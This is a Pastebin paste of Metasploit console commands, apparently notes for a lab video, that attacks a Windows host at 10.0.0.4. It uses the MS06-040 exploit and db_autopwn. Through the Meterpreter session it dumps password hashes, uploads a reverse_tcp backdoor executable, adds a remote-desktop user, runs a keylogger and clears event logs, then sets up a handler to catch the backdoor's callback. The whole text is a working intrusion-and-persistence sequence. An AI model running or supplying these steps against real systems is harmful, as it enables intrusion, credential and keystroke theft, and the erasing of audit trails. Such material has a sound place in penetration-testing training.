Advertisement
Guest User

g0tmi1k

a guest
Mar 6th, 2010
1,961
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.72 KB | None | 0 0
  1. cd /pentest/exploits/framework3/
  2. ./msfconsole
  3. db_create g0tmi1k
  4. db_hosts
  5. db_add_host 10.0.0.4
  6. db_hosts
  7.  
  8. #show                             ##Show everything! [wasn't in video]
  9.  
  10. use windows/smb/ms06_040_netapi
  11. #use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
  12.  
  13. #set paypload windows/shell_bind_tcp         ##Could do a windows shell (not as powerful as meterpreter)
  14. #set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
  15. set payload windows/vncinject/bind_tcp
  16. show options
  17. set lhost 10.0.0.6
  18. show options
  19. exploit
  20.  
  21. db_del_host 10.0.0.4
  22. db_hosts
  23. db_nmap -n 1O 10.0.0.1-5
  24. db_hosts
  25.  
  26. db_autopwn -t -p -e
  27.  
  28. sessions -l
  29. sessoins -i 1
  30.  
  31. sysinfo
  32. #ipconfig   ##IP information [wasn't in video]
  33. idletime
  34. ps
  35. kill [number]
  36. getuid
  37. #migrate // getsystem // use priv  ##If the exploit doesn't have system privileges! [wasn't in video]
  38. hashdump
  39. # execute                  ## Runs a command [wasn't in video]
  40. shell
  41. pwd
  42. ls
  43. cd C:/
  44. ls
  45. mkdir g0tmi1k
  46. ls
  47. cd g0tmi1k
  48. cat C:/boot.ini
  49. download C:/boot.ini /tmp/boot.ini
  50. ./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
  51. upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
  52. run getgui -u g0tmi1k -p haveyou
  53. run keylogrecorder
  54. ## More scripts: /pentest/exploits/framework3/scripts/meterpreter
  55. #run scraper    ##Gets information about target, dumps reg etc[wasn't in video]
  56. #run vnc        ##Setups VNC [wasn't in video]
  57. #run uploadexec ##Upload and run a program [wasn't in video]
  58. clearev
  59. exit -y
  60. exit -y
  61.  
  62. ##Start fresh for the backdoor!
  63. ./msfconsole
  64. use exploit/multi/handler
  65. set PAYLOAD windows/meterpreter/reverse_tcp
  66. set LHOST 10.0.0.6
  67. exploit
  68.  
  69. ## Somehow run: C:\g0tmi1k\g0tmi1k.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement